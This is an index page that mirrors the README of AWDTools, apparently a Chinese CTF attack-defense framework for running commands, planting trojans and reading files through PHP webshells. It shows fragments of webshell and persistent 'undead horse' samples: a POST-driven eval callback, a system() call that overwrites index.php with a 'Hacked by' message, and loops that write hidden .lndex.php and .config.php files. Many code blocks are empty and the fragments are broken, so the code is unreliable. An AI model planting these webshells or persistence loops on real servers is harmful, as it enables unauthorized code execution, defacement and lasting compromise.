Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/H3rmesk1t/AWDTools

一个简易的AWD攻击框架,希望对于该项目大家有更好的建议和改进!
https://github.com/H3rmesk1t/AWDTools

Last synced: about 1 month ago
JSON representation

一个简易的AWD攻击框架,希望对于该项目大家有更好的建议和改进!

Awesome Lists containing this project

README

        

# AWDTools 说明

## V1.0.0
| Python版本 | 适用语言 | 版本 | 最近更新时间 |
| :----------: | :--------: | :------: | :------------: |
| 3.8+ | php | V1.0.0 | 2021.12.13 |

## 使用

> 安装所需第三方库
```
pip install -r requirements.txt
```
> 运行命令
```
python main.py
```

## 功能
### 命令执行
> 根据一句话木马后门或者已种后门马来填写攻击`WebShell`来进行攻击

### 木马种植
> 根据一句话木马后门或者已种后门马来填写种马`WebShell`来进行种马

### 文件读取
> 根据一句话木马后门或者已种后门马来填写文件读取`WebShell`来读取文件

### 目标扫描
> 还未开发

### 定时攻击
> 还未开发

## 木马描述
> 双层`MD5`的`D1noH3rmesk1t`的值为:`ddbaedeb6010fcd8df373dd723ff6920`

### common_horse_1
```php

```

### common_horse_2
```php

```

### undead_horse_1
> 命令执行不死马

```php

```
> base64 内容

```php
$_POST["d1no"]),array("test"=>array("filter"=>FILTER_CALLBACK,"options"=>"eval")));
}
@system('echo "Hacked by H3rmesk1t." > /var/www/html/public/index.php');
?>
```

### undead_horse_2
> 直接读取文件不死马

```php
> /var/www/html/.lndex.php;sleep 0.1;done;');
?>
```

> base64 内容

```php

```

### undead_horse_3
> 追加文件写入

```php

```
> base64 内容

```php
> /var/www/html/public/.config.php;sleep 5;done;');?>
```
> base64 内容

```php
?>
```

### undead_horse_4
> 写入`.htaccess`或者`.user.ini`文件